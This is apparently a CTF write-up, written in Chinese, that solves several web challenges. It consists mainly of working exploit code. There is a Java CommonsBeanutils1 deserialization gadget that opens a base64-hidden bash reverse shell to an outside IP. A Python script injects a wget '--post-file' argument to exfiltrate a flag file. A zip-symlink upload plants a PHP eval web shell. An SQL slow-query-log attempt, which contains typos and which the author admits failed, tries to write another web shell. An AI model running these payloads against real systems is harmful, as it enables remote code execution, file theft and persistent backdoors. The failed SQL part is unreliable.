Web
Java
返回头有日志路径。然后有jar目录。直接输入jar包就有了。。。
有个路由反序列化。用CommonsBeanutils1不依赖cc的链子
package com.example.demo;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.beanutils.BeanComparator;
import org.apache.tomcat.util.codec.binary.Base64;
import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.PriorityQueue;
import java.util.Collections;
public class guoke {
// 反射修改field,统一写成函数,方便阅读代码
public static void setFieldValue(Object object, String fieldName, Object value) throws Exception{
Field field = object.getClass().getDeclaredField(fieldName);
field.setAccessible(true);
field.set(object, value);
}
// 获取攻击链序列化后的byte数组
public static byte[] getPayload() throws Exception {
// 创建恶意类,用于报错抛出调用链
ClassPool pool = ClassPool.getDefault();
CtClass payload = pool.makeClass("EvilClass");
payload.setSuperclass(pool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet"));
// 看shiro调用链用这个
// payload.makeClassInitializer().setBody("new java.io.IOException().printStackTrace();");
payload.makeClassInitializer().setBody("java.lang.Runtime.getRuntime().exec(\"bash -c {echo,L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xLjE1LjY3LjE0Mi8xMzM3IDA+JjE=}|{base64,-d}|{bash,-i}\");");
byte[] evilClass = payload.toBytecode();
// set field
TemplatesImpl templates = new TemplatesImpl();
setFieldValue(templates, "_bytecodes", new byte[][]{evilClass});
setFieldValue(templates, "_name", "test");
setFieldValue(templates,"_tfactory", new TransformerFactoryImpl());
// 创建序列化对象
BeanComparator beanComparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER); // **修改点1**
PriorityQueue<Object> queue = new PriorityQueue<Object>(2, beanComparator);
queue.add("1"); // **修改点2**
queue.add("1");
// 修改值
setFieldValue(beanComparator, "property", "outputProperties");
setFieldValue(queue, "queue", new Object[]{templates, templates});
// 反序列化
ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
ObjectOutputStream out = new ObjectOutputStream(byteArrayOutputStream);
out.writeObject(queue);
out.close();
return byteArrayOutputStream.toByteArray();
}
public static void main(String[] args) throws Exception {
byte[] payloads = guoke.getPayload();
System.out.println(Base64.encodeBase64String(payloads));
}
}
wget
U1S1。去年纵横杯的题白盒到这就黑盒做了???
import base64
import re
import requests
from Crypto.Cipher import PKCS1_v1_5 as Cipher_pksc1_v1_5
from Crypto.PublicKey import RSA
def encrpt(password, public_key):
rsakey = RSA.importKey(public_key)
cipher = Cipher_pksc1_v1_5.new(rsakey)
cipher_text = base64.b64encode(cipher.encrypt(password.encode()))
return cipher_text.decode()
url="http://1.15.67.142:1337/\\n?\t--post-file=flag_is_here"
public_key = '-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAoFH2atPqJOH6yezxEw9seStp0j7hN3cKKlANZpAv8RRhpDxFcob47OwkyUlsJp6tdvSJBtsJ5KCNYIomdqc7+f4PJvShHatMLGBRFjUkr0aunqq9LDobEHrzwSEEX6V0V+73EdbieYxFHCz2cXaBMpnIK19c+u6sgVJFjZ+oggVyKuOtOUscnzzrMhOWGl+eXk+dBe0wjSTrq84zvRI194uTehhY/8hzZjkQavV8NWq0b7l6hJHsO7mp2tGye1npYRQ/tZCEMkzO+PaAkPf6H3CyuVgbdMJcuSBJT8kBRQ6P16skZIqrY+NRmdSJmMoGgR9NYVvk8soeSj4MHRpbrwIDAQAB\n-----END PUBLIC KEY-----'
password = encrpt(url, public_key)
res=(requests.post(url="http://192.168.40.126:1003/wget",data={"encryptdata":password}).text)
print(requests.get("http://192.168.40.126:1003/wget").text)
zipzip
ln -s /var/www/html guoke
zip --symlinks guoke.zip guoke
上传guoke.zip
rm -rf guoke
mkdir guoke
echo '<?php eval($_POST[1]);?>' > guoke/guoke.php
zip -y guoke1.zip guoke/*
上传guoke1.zip
ezsql
1);
set GLOBAL slow_query_log_file='/var/www/html/helpyou2findflag.php';
set GLOBAL slow_query_log=on;
setglobal long_query_time=0.000001;
elect '<?php $_REQUEST[a]($_REQUEST[b])?>';--+
听说是慢查询getshell?然而没复现成功。等WP了